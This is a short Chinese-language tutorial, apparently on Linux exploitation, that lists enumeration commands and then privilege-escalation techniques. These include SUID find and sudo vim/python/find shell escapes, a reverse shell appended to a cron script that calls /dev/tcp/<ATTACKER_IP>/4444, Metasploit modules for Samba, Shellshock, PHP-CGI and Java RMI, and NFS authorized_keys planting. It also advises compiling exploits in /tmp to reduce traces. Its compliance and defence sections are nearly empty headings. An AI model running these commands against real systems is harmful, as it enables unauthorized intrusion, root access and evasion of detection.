Linux 系统中 Exploit 漏洞的发现与利用
一、合规与范围
二、发现阶段
uname -a、cat /etc/*-release、cat /proc/version,确认内核版本、发行版、架构,为后续匹配 CVE/EXP 做准备。nmap -sV -p- <IP> 识别运行服务与版本,定位潜在远程利用入口(如 Web、SMB、NFS、RMI 等)。find / -perm -u=s -type f 2>/dev/null、find / -perm -g=s -type f 2>/dev/null,筛查可被滥用的特权程序。cat /etc/crontab、ls -la /etc/cron.*,检查可写脚本/路径劫持与弱权限配置。sudo -l,识别可无密码或低交互执行的命令(如 vim、python、find 等)。uname -r或手动输入内核字符串,输出可能可利用的 CVE 与 PoC 链接;支持--checksec查看安全机制状态。searchsploit linux kernel 5. 进行版本范围匹配,再用searchsploit -m <ID>镜像到本地工作目录,避免污染原始文件。三、利用阶段
/dev/shm或/tmp编译执行,降低痕迹。find具 SUID,可执行find . -exec /bin/sh -p \; -quit直接获取高权限 shell。sudo -l结果选择对应技术,例如:
sudo vim -c ':!/bin/sh'sudo python -c 'import os; os.system("/bin/sh")'sudo find / -exec bash -p \;echo 'bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1' >> /path/to/task.sh。msfconsole 使用 exploit/multi/samba/usermap_script 获取命令执行。exploit/multi/http/apache_mod_cgi_bash_env_exec 通过 CGI 环境变量触发。exploit/multi/http/php_cgi_arg_injection。exploit/multi/misc/java_rmi_server。showmount -e <IP> 探测导出目录,挂载后写入authorized_keys实现SSH 登录。四、防护与检测
chattr +i)。五、合规提示